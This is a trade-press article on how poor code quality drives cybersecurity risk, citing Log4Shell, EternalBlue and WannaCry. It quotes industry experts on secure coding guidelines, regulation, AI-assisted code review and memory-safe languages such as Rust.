Skip to main content

It is largely recognised among the IT security community that there is a direct correlation between the quality of code – as a percentage of coding errors per thousand lines of code – and cyber security. Simply put, the more bugs in code, the greater the chance they will be exploited as an attack vector. Pressure to improve code quality is being driven internally by business and IT leaders, and externally by regulators and policy-makers. 

There are direct and indirect benefits to improving the quality of programming. Beyond the cyber security risk, coding errors that occur in production environments are costly to fix, compared with those identified early on in a project’s lifecycle. Poor-quality software affects customer and employee experience, which potentially hampers productivity and may lead to lost revenue.

IDC’s recently published Worldwide semiannual software tracker reports that there is demand for improved resiliency. The IDC data shows an increase in spending on software quality and lifecycle tools – which grew by over 26% in constant currency.

Highly publicised exploits such as Log4Shell – the exploit that made use of vulnerability in Log4js, the Java-based logging utility that is embedded in numerous applications – sent shockwaves across the tech sector, highlighting the risk in embedding third-party code in software development projects. These third-party components, web services or libraries speed up software development, not only saving time, but also lowering the volume of coding errors because programmers can rely on others to create the complements they need, without having to develop everything from scratch.

The more popular libraries are extensively tested in hundreds of thousands of projects, which means bugs can be ironed out quickly. But, as was the case with Log4Shell, some can remain unidentified, so the first organisations hear about the problem is when it is being exploited.

In a bid to protect the internet and critical national infrastructure, the US government’s National Cybersecurity Strategy places the responsibility for IT security on the organisations that manage and run digital ecosystems, moving the responsibility for poor cyber security away from users to the companies operating these platforms.

In a blog discussing the new rules, Tidelift warns that one of the highest-level impacts organisations are likely to see coming out of the new policy is that the government is proposing a more overt, active approach to improving cyber security by increasing regulation and mandatory requirements.

To remain compliant with the latest standards, Joseph Foote, a cyber security expert at PA Consulting, says organisations in regulated sectors must provide proof that their key infrastructure has undergone a form of in-depth security assurance. “If these companies are not compliant, they risk fines and penalties, and insurance providers may no longer be willing to renew contracts,” he adds.

Reducing risk and potential impact to the business, both financially and reputationally, will be at the forefront of many businesses’ minds, and this applies to software, how it is developed and the security of third-party services that the organisation needs to achieve a business objective.

Security, from a coding perspective, starts with a set of guidelines, which Foote says is intended to govern and enforce a methodology that should be followed when implementing new software-enabled features. These guidelines, he says, range from simple suggestions, like ensuring documentation is created when expanding the existing code base, to detailing the structure and layout of the code itself.

Quality control

In Foote’s experience, developers will often conform their code bases to a specific design paradigm for the purposes of futureproofing, increasing modularity and reducing the likelihood of mistakes occurring due to overall code complexity. But even the most robust guidelines can still allow for bugs and mistakes in the final code, although the frequency of issues typically lessen as the guidelines mature.

“Some of the vulnerabilities that have caused the biggest impact can be traced back to oversights in secure coding practices, and some of the most problematic weaknesses in our most popular software could have been caught with strict quality control and secure coding guidelines,” he says.

Take EternalBlue, which targeted a vulnerability in Microsoft’s Windows operating system and its core components to allow execution of malicious code. Although the EternalBlue exploit – officially named MS17-010 by Microsoft – affects only Windows operating systems, anything that uses the SMBv1 (Server Message Block version 1) file-sharing protocol is technically at risk of being targeted for ransomware and other cyber attacks.

In a post describing EternalBlue, security firm Avast quotes a New York Times article, which alleges that the US National Security Agency (NSA) took a year to identify the bug in the Windows operating system, then developed EternalBlue to exploit the vulnerability. According to the New York Times article, the NSA used EternalBlue for five years before alerting Microsoft to its existence. The NSA was broken into and EternalBlue found its way into the hands of hackers, leading to the WannaCry ransomware attack.

As Foote points out, EternalBlue was a coding issue.

Charles Beadnall, chief technology officer (CTO) at GoDaddy, urges IT leaders to make sure the code being developed is written to the highest level of quality.

As code becomes more complex and makes use of third-party service and software libraries or open source components, it becomes harder to identify coding issues and take remedial action.

A survey of 1,300 CISOs in large enterprises with over 1,000 employees, conducted by Coleman Parkes and commissioned by Dynatrace in March 2023, found that over three-quarters (77%) of CISOs say it’s a significant challenge to prioritise vulnerabilities because of a lack of information about the risk they pose to their environment.

Discussing the results, Bernd Greifeneder, CTO at Dynatrace, says: “The growing complexity of software supply chains and the cloud-native technology stacks that provide the foundation for digital innovation make it increasingly difficult to quickly identify, assess and prioritise response efforts when new vulnerabilities emerge.

“These tasks have grown beyond human ability to manage. Development, security and IT teams are finding that the vulnerability management controls they have in place are no longer adequate in today’s dynamic digital world, which exposes their businesses to unacceptable risk.”

Reducing the risk of poor software quality

Beadnall says one of the important things with security is to make sure there are controls in place for what you’re deploying and how you are monitoring.

He is a big fan of running coding projects like a lab experiment, where a hypothesis is tested and the results are measured and compared against a control dataset. “Running experiments is helpful in terms of quantifying and classifying the types of code you’re rolling out, the impact to customers and better understanding deployment,” he says.

Trustwave researchers recently tested ChatGPT’s ability to write code and identify common programmer errors such as buffer overflow, which can easily be exploited by hackers. Karl Sigler, threat intelligence manager at Trustwave, expects ChatGPT and other generative AI systems to become part of the software development lifecycle.

Beadnall sees generative AI as something that could be used to oversee the work developers do, in the same way as peer programming. “We are experimenting with a number of different techniques where AI is being used as a peer programmer to make sure we are writing higher quality code,” he says. “I think this is a very logical first step.”

In the short term, the tools themselves are improving, to make coding more secure. “Automation and security are at the heart of enablement. AI tools enable workers to create and produce in new, creative ways, while security is the underlying fortification that allows their introduction to the enterprise,” says Tom Vavra, head of IDC’s data and analytics team, European software.

PA’s Foote says companies with large development teams are gradually making the transition to safer standards and safer programming languages, such as Rust. This partially combats the problem by enforcing a secure-by-design paradigm where any operation deemed unsafe must be explicitly declared, decreasing the likelihood of insecure operation through oversights.

“Secure-by-design paradigms are a leap forward in development practices, along with modern advancements in secure coding practices,” he adds.

To demonstrate that their organisations are secure and trustworthy, Foote believes IT leaders will need to run detail-oriented security assessments.

Leave a Reply